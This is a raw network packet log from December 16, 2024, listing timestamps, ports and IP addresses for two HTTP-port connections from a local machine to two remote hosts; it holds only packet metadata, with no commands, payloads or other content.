Dec 16, 2024 11:03:30.989840984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.990662098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.990770102 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.990775108 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.990825891 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.991739988 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.991745949 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:30.991837978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.991889000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.992824078 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.992877007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.992934942 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.992984056 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.993928909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.994020939 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.994082928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.995012045 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.995069981 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.995162964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.995841980 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.996071100 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.996191978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.996249914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.997159004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.997220039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.997298956 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.997345924 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.998298883 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.998333931 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.998351097 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.998378992 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.999336958 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.999387980 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.999433994 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.999478102 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.000391006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.000446081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.000488043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.000533104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.001478910 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.001527071 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.001574039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.001619101 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.002640963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.002693892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.002751112 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.003736973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.003794909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.003848076 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.004748106 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.004796982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.004863024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.004990101 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.005805969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.005908012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.005958080 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.006931067 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.007006884 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.007033110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.007080078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.007986069 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.008080959 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.008095026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.008142948 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.009063959 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.009124041 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.009187937 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.009241104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.010220051 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.010267019 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.010318995 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.010360956 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.011214972 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.011266947 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.011343002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.011388063 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.012331009 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.012393951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.012459040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.012510061 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.013427973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.013478994 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.013559103 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.013638973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.014503956 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.014554977 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.014559031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.014612913 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.015599012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.015661001 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.015703917 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.015861034 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.016670942 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.016721964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.016808033 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.016856909 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.017735958 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.017791986 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.017827034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.018050909 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.019020081 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.019112110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.019171000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.019885063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.019933939 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.019977093 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.020021915 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.020992994 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.021048069 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.021107912 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.022090912 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.022146940 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.022361040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.022692919 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.023133993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.023199081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.023264885 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.023910999 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.024239063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.024302006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.024316072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.024800062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.025326014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.025374889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.025439024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.025717020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.026407957 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.026472092 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.111536980 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.114787102 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.115789890 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.161820889 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.161863089 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.161950111 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.162298918 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.162348986 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.162380934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.162426949 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.163389921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.163446903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.163496017 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.164429903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.164475918 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.164545059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.164593935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.165523052 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.165575027 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.165642023 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.165684938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.166584969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.166726112 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.166771889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.167687893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.167733908 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.167799950 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.167843103 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.168761015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.168889999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.168940067 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.169852018 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.169898033 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.169945955 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.169991970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.170917034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.171046019 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.171093941 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.172005892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.172070980 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.172122955 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.172167063 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.173079967 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.173125982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.173199892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.173249006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.174292088 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.174329042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.174336910 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.174384117 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.175331116 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.175390005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.175446033 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.176372051 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.176434994 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.176479101 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.176528931 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.177439928 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.177490950 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.177558899 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.177603960 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.178507090 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.178632021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.178683043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.179606915 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.179655075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.179784060 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.179830074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.180685997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.180731058 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.180779934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.181783915 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.181835890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.181843042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.181889057 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.182837963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.182876110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.182884932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.182919979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.183980942 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.184034109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.184118986 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.184165001 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.185055017 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.185101986 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.185198069 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.185246944 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.186111927 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.186223984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.186271906 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.187206984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.187330961 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.187390089 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.188262939 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.188317060 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.188441038 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.188492060 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.189349890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.189409018 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.189466000 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.189515114 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.190412998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.190538883 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.190596104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.191498041 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.191557884 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.191632032 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.191683054 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.192606926 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.192665100 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.192734003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.193681002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.193742990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.193871021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.193926096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.194763899 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.194824934 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.194892883 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.194947004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.195878029 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.195955038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.195980072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.196027040 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.196929932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.196979046 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.197042942 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.198098898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.198143959 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.198198080 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.198245049 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.199603081 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.199640989 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.199695110 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.200160027 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.200212002 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.200283051 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.200335026 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.201222897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.201349020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.201376915 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.201428890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.202483892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.202569962 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.202621937 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.203459024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.203495979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.203521967 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.203547001 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.204529047 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.204576015 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.204658985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.204703093 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.205600977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.205723047 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.205770016 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.206686974 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.206733942 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.206799030 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.206844091 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.207752943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.207798004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.207879066 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.207920074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.208867073 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.208921909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.208965063 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.209958076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.210005045 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.210069895 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.210114002 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.210990906 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.211103916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.211148977 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.212106943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.212152004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.212243080 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.212289095 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.213196039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.213248968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.213314056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.213777065 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.214262962 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.214317083 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.214382887 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.214438915 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.215373993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.215431929 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.215461969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.215507984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.216428995 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.216483116 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.216532946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.216578960 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.217499018 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.217628956 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.217693090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.218564034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.218632936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.235676050 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.235707998 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.235801935 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.235806942 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.235836983 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.235901117 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.235920906 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.235949993 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.236001015 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.236004114 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.236032009 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.236088037 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.236102104 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.236134052 CET	80	49843	141.8.192.141	192.168.2.5
